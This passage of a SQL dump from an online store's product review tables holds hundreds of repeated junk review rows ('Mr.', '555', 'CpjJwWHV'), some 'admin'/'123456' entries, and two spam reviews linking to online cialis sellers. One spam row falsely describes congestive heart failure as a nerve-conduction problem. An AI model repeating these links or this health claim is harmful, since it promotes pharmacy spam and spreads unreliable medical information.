(1376, 1376, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1377, 1377, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1378, 1378, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1379, 1379, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1380, 1380, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1381, 1381, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1382, 1382, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1383, 1383, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1384, 1384, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1385, 1385, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1386, 1386, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1387, 1387, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1388, 1388, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1389, 1389, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1390, 1390, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1391, 1391, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1392, 1392, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1393, 1393, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1394, 1394, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1395, 1395, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1396, 1396, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1397, 1397, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1398, 1398, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1399, 1399, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1400, 1400, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1401, 1401, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1402, 1402, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1403, 1403, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1404, 1404, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1405, 1405, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1406, 1406, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1407, 1407, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1408, 1408, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1409, 1409, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1410, 1410, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1411, 1411, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1412, 1412, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1413, 1413, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1414, 1414, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1415, 1415, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1416, 1416, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1417, 1417, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1418, 1418, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1419, 1419, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1420, 1420, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1421, 1421, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1422, 1422, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1423, 1423, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1424, 1424, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1425, 1425, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1426, 1426, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1427, 1427, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1428, 1428, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1429, 1429, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1430, 1430, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1431, 1431, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1432, 1432, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1433, 1433, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1434, 1434, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1435, 1435, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1436, 1436, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1437, 1437, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1438, 1438, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1439, 1439, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1440, 1440, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1441, 1441, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1442, 1442, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1443, 1443, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1444, 1444, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1445, 1445, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1446, 1446, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1447, 1447, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1448, 1448, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1449, 1449, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1450, 1450, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1451, 1451, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1452, 1452, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1453, 1453, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1454, 1454, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1455, 1455, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1456, 1456, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1457, 1457, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1458, 1458, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1459, 1459, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1460, 1460, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1461, 1461, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1462, 1462, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1463, 1463, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1464, 1464, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1465, 1465, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1466, 1466, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1467, 1467, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1468, 1468, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1469, 1469, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1470, 1470, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1471, 1471, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1472, 1472, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1473, 1473, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1474, 1474, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1475, 1475, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1476, 1476, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1477, 1477, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1478, 1478, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1479, 1479, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1480, 1480, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1481, 1481, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1482, 1482, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1483, 1483, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1484, 1484, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1485, 1485, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1486, 1486, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1487, 1487, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1488, 1488, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1489, 1489, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1490, 1490, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1491, 1491, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1492, 1492, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1493, 1493, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1494, 1494, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1495, 1495, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1496, 1496, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1497, 1497, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1498, 1498, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1499, 1499, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1500, 1500, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1501, 1501, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1502, 1502, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1503, 1503, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1504, 1504, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1505, 1505, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1506, 1506, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1507, 1507, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1508, 1508, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1509, 1509, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1510, 1510, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1511, 1511, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1512, 1512, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1513, 1513, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1514, 1514, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1515, 1515, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1516, 1516, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1517, 1517, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1518, 1518, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1519, 1519, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1520, 1520, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1521, 1521, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1522, 1522, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1523, 1523, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1524, 1524, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1525, 1525, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1526, 1526, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1527, 1527, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1528, 1528, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1529, 1529, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1530, 1530, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1531, 1531, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1532, 1532, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1533, 1533, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1534, 1534, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1535, 1535, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1536, 1536, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1537, 1537, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1538, 1538, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1539, 1539, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1540, 1540, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1541, 1541, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1542, 1542, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1543, 1543, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1544, 1544, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1545, 1545, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1546, 1546, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1547, 1547, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1548, 1548, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1549, 1549, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1550, 1550, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1551, 1551, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1552, 1552, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1553, 1553, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1554, 1554, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1555, 1555, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1556, 1556, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1557, 1557, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1558, 1558, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1559, 1559, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1560, 1560, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1561, 1561, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1562, 1562, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1563, 1563, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1564, 1564, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1565, 1565, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1566, 1566, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1567, 1567, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1568, 1568, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1569, 1569, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1570, 1570, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1571, 1571, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1572, 1572, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1573, 1573, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1574, 1574, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1575, 1575, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1576, 1576, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1577, 1577, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1578, 1578, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1579, 1579, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1580, 1580, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1581, 1581, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1582, 1582, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1583, 1583, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1584, 1584, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1585, 1585, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1586, 1586, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1587, 1587, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1588, 1588, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1589, 1589, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1590, 1590, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1591, 1591, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1592, 1592, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1593, 1593, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1594, 1594, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1595, 1595, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1596, 1596, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1597, 1597, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1598, 1598, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1599, 1599, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1600, 1600, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1601, 1601, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1602, 1602, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1603, 1603, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1604, 1604, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1605, 1605, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1606, 1606, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1607, 1607, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1608, 1608, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1609, 1609, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1610, 1610, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1611, 1611, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1612, 1612, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1613, 1613, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1614, 1614, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1615, 1615, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1616, 1616, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1617, 1617, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1618, 1618, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1619, 1619, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1620, 1620, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1621, 1621, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1622, 1622, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1623, 1623, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1624, 1624, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1625, 1625, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1626, 1626, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1627, 1627, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1628, 1628, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1629, 1629, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1630, 1630, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1631, 1631, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1632, 1632, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1633, 1633, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1634, 1634, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1635, 1635, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1636, 1636, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1637, 1637, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1638, 1638, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1639, 1639, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1640, 1640, 1, 'Mr.', '555', 'CpjJwWHV', NULL),
(1641, 1641, 1, '123456', '123456', 'admin', NULL),
(1642, 1642, 1, '123456', '123456', 'admin', NULL),
(1643, 1643, 1, '123456', '123456', 'admin', NULL),
(1644, 1644, 1, 'buy daily dose cialis', '<a href=http://cialiss.buzz>buy cialis online in usa</a> Jmbg provera and technologies', 'ZeztUp', NULL),
(1645, 1645, 1, 'tadalafil how long does it last', '<a href=https://cialis.lat/discover-the-best-prices-for-cialis>buying cialis online forum</a> Congestive heart failure, he says, is a problem of poor nerve conductivity to the heart, an almost paralyzing weakness of the heart muscle, and the resultant failure of the heart muscle to be able to pump out blood', 'SpouRne', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `review_entity`
--

CREATE TABLE `review_entity` (
  `entity_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Review entity ID',
  `entity_code` varchar(32) NOT NULL COMMENT 'Review entity code'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Review entities';

--
-- Dumping data for table `review_entity`
--

INSERT INTO `review_entity` (`entity_id`, `entity_code`) VALUES
(1, 'product'),
(2, 'customer'),
(3, 'category');

-- --------------------------------------------------------

--
-- Table structure for table `review_entity_summary`
--

CREATE TABLE `review_entity_summary` (
  `primary_id` bigint(20) NOT NULL COMMENT 'Summary review entity ID',
  `entity_pk_value` bigint(20) NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `entity_type` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Entity type ID',
  `reviews_count` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Qty of reviews',
  `rating_summary` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Summarized rating',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Review aggregates';

--
-- Dumping data for table `review_entity_summary`
--

INSERT INTO `review_entity_summary` (`primary_id`, `entity_pk_value`, `entity_type`, `reviews_count`, `rating_summary`, `store_id`) VALUES
(227, 2053, 1, 3, 60, 0),
(228, 2053, 1, 3, 60, 1),
(229, 2063, 1, 0, 0, 1),
(230, 2064, 1, 1, 100, 1),
(231, 2064, 1, 1, 100, 0),
(232, 2055, 1, 0, 0, 1),
(233, 2062, 1, 0, 0, 1),
(234, 2061, 1, 0, 0, 1),
(235, 2059, 1, 0, 0, 1),
(236, 2054, 1, 0, 0, 1),
(237, 2060, 1, 0, 0, 1),
(238, 2058, 1, 0, 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `review_status`
--

CREATE TABLE `review_status` (
  `status_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Status ID',
  `status_code` varchar(32) NOT NULL COMMENT 'Status code'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Review statuses';

--
-- Dumping data for table `review_status`
--

INSERT INTO `review_status` (`status_id`, `status_code`) VALUES
(1, 'Approved'),
(2, 'Pending'),
(3, 'Not Approved');

-- --------------------------------------------------------

--
-- Table structure for table `review_store`
--

CREATE TABLE `review_store` (
  `review_id` bigint(20) UNSIGNED NOT NULL COMMENT 'Review ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Review Store';

--
-- Dumping data for table `review_store`
--

INSERT INTO `review_store` (`review_id`, `store_id`) VALUES
(313, 0),
(313, 1),
(314, 0),
(314, 1),
(315, 0),
(315, 1),
(316, 0),
(316, 1),
(317, 0),
(317, 1),
(318, 0),
(318, 1),
(319, 0),
(319, 1),
(320, 0),
(320, 1),
(321, 0),
(321, 1),
(322, 0),
(322, 1),
(323, 0),
(323, 1),
(324, 0),
(324, 1),
(325, 0),
(325, 1),
(326, 0),
(326, 1),
(327, 0),
(327, 1),
(328, 0),
(328, 1),
(329, 0),
(329, 1),
(330, 0),
(330, 1),
(331, 0),
(331, 1),
(332, 0),
(332, 1),
(333, 0),
(333, 1),
(334, 0),
(334, 1),
(335, 0),
(335, 1),
(336, 0),
(336, 1),
(337, 0),
(337, 1),
(338, 0),
(338, 1),
(339, 0),
(339, 1),
(340, 0),
(340, 1),
(341, 0),
(341, 1),
(342, 0),
(342, 1),
(343, 0),
(343, 1),
(344, 0),
(344, 1),
(345, 0),
(345, 1),
(346, 0),
(346, 1),
(347, 0),
(347, 1),
(348, 0),
(348, 1),
(349, 0),
(349, 1),
(350, 0),
(350, 1),
(351, 0),
(351, 1),
(352, 0),
(352, 1),
(353, 0),
(353, 1),
(354, 0),
(354, 1),
(355, 0),
(355, 1),
(356, 0),
(356, 1),
(357, 0),
(357, 1),
(358, 0),
(358, 1),
(359, 0),
(359, 1),
(360, 0),
(360, 1),
(361, 0),
(361, 1),
(362, 0),
(362, 1),
(363, 0),
(363, 1),
(364, 0),
(364, 1),
(365, 0),
(365, 1),
(366, 0),
(366, 1),
(367, 0),
(367, 1),
(368, 0),
(368, 1),
(369, 0),
(369, 1),
(370, 0),
(370, 1),
(371, 0),
(371, 1),
(372, 0),
(372, 1),
(373, 0),
(373, 1),
(374, 0),
(374, 1),
(375, 0),
(375, 1),
(376, 0),
(376, 1),
(377, 0),
(377, 1),
(378, 0),
(378, 1),
(379, 0),
(379, 1),
(380, 0),
(380, 1),
(381, 0),
(381, 1),
(382, 0),
(382, 1),
(383, 0),
(383, 1),
(384, 0),
(384, 1),
(385, 0),
(385, 1),
(386, 0),
(386, 1),
(387, 0),
(387, 1),
(388, 0),
(388, 1),
(389, 0),
(389, 1),
(390, 0),
(390, 1),
(391, 0),
(391, 1),
(392, 0),
(392, 1),
(393, 0),
(393, 1),
(394, 0),
(394, 1),
(395, 0),
(395, 1),
(396, 0),
(396, 1),
(397, 0),
(397, 1),
(398, 0),
(398, 1),
(399, 0),
(399, 1),
(400, 0),
(400, 1),
(401, 0),
(401, 1),
(402, 0),
(402, 1),
(403, 0),
(403, 1),
(404, 0),
(404, 1),
(405, 0),
(405, 1),
(406, 0),
(406, 1),
(407, 0),
(407, 1),
(408, 0),
(408, 1),
(409, 0),
(409, 1),
(410, 0),
(410, 1),
(411, 0),
(411, 1),
(412, 0),
(412, 1),
(413, 0),
(413, 1),
(414, 0),
(414, 1),
(415, 0),
(415, 1),
(416, 0),
(416, 1),
(417, 0),
(417, 1),
(418, 0),
(418, 1),
(419, 0),
(419, 1),
(420, 0),
(420, 1),
(421, 0),
(421, 1),
(422, 0),
(422, 1),
(423, 0),
(423, 1),
(424, 0),
(424, 1),
(425, 0),
(425, 1),
(426, 0),
(426, 1),
(427, 0),
(427, 1),
(428, 0),
(428, 1),
(429, 0),
(429, 1),
(430, 0),
(430, 1),
(431, 0),
(431, 1),
(432, 0),
(432, 1),
(433, 0),
(433, 1),
(434, 0),
(434, 1),
(435, 0),
(435, 1),
(436, 0),
(436, 1),
(437, 0),
(437, 1),
(438, 0),
(438, 1),
(439, 0),
(439, 1),
(440, 0),
(440, 1),
(441, 0),
(441, 1),
(442, 0),
(442, 1),
(443, 0),
(443, 1),
(444, 0),
(444, 1),
(445, 0),
(445, 1),
(446, 0),
(446, 1),
(447, 0),
(447, 1),
(448, 0),
(448, 1),
(449, 0),
(449, 1),
(450, 0),
(450, 1),
(451, 0),
(451, 1),
(452, 0),
(452, 1),
(453, 0),
(453, 1),
(454, 0),
(454, 1),
(455, 0),
(455, 1),
(456, 0),
(456, 1),
(457, 0),
(457, 1),
(458, 0),
(458, 1),
(459, 0),
(459, 1),
(460, 0),
(460, 1),
(461, 0),
(461, 1),
(462, 0),
(462, 1),
(463, 0),
(463, 1),
(464, 0),
(464, 1),
(465, 0),
(465, 1),
(466, 0),
(466, 1),
(467, 0),
(467, 1),
(468, 0),
(468, 1),
(469, 0),
(469, 1),
(470, 0),
(470, 1),
(471, 0),
(471, 1),
(472, 0),
(472, 1),
(473, 0),
(473, 1),
(474, 0),
(474, 1),
(475, 0),
(475, 1),
(476, 0),
(476, 1),
(477, 0),
(477, 1),
(478, 0),
(478, 1),
(479, 0),
(479, 1),
(480, 0),
(480, 1),
(481, 0),
(481, 1),
(482, 0),
(482, 1),
(483, 0),
(483, 1),
(484, 0),
(484, 1),
(485, 0),
(485, 1),
(486, 0),
(486, 1),
(487, 0),
(487, 1),
(488, 0),
(488, 1),
(489, 0),
(489, 1),
(490, 0),
(490, 1),
(491, 0),
(491, 1),
(492, 0),
(492, 1),
(493, 0),
(493, 1),
(494, 0),
(494, 1),
(495, 0),
(495, 1),
(496, 0),
(496, 1),
(497, 0),
(497, 1),
(498, 0),
(498, 1),
(499, 0),
(499, 1),
(500, 0),
(500, 1),
(501, 0),
(501, 1),
(502, 0),
(502, 1),
(503, 0),
(503, 1),
(504, 0),
(504, 1),
(505, 0),
(505, 1),
(506, 0),
(506, 1),
(507, 0),
(507, 1),
(508, 0),
(508, 1),
(509, 0),
(509, 1),
(510, 0),
(510, 1),
(511, 0),
(511, 1),
(512, 0),
(512, 1),
(513, 0),
(513, 1),
(514, 0),
(514, 1),
(515, 0),
(515, 1),
(516, 0),
(516, 1),
(517, 0),
(517, 1),
(518, 0),
(518, 1),
(519, 0),
(519, 1),
(520, 0),
(520, 1),
(521, 0),
(521, 1),
(522, 0),
(522, 1),
(523, 0),
(523, 1),
(524, 0),
(524, 1),
(525, 0),
(525, 1),
(526, 0),
(526, 1),
(527, 0),
(527, 1),
(528, 0),
(528, 1),
(529, 0),
(529, 1),
(530, 0),
(530, 1),
(531, 0),
(531, 1),
(532, 0),
(532, 1),
(533, 0),
(533, 1),
(534, 0),
(534, 1),
(535, 0),
(535, 1),
(536, 0),
(536, 1),
(537, 0),
(537, 1),
(538, 0),
(538, 1),
(539, 0),
(539, 1),
(540, 0),
(540, 1),
(541, 0),
(541, 1),
(542, 0),
(542, 1),
(543, 0),
(543, 1),
(544, 0),
(544, 1),
(545, 0),
(545, 1),
(546, 0),
(546, 1),
(547, 0),
(547, 1),
(548, 0),
(548, 1),
(549, 0),
(549, 1),
(550, 0),
(550, 1),
(551, 0),
(551, 1),
(552, 0),
(552, 1),
(553, 0),
(553, 1),
(554, 0),
(554, 1),
(555, 0),
(555, 1),
(556, 0),
(556, 1),
(557, 0),
(557, 1),
(558, 0),
(558, 1),
(559, 0),
(559, 1),
(560, 0),
(560, 1),
(561, 0),
(561, 1),
(562, 0),
(562, 1),
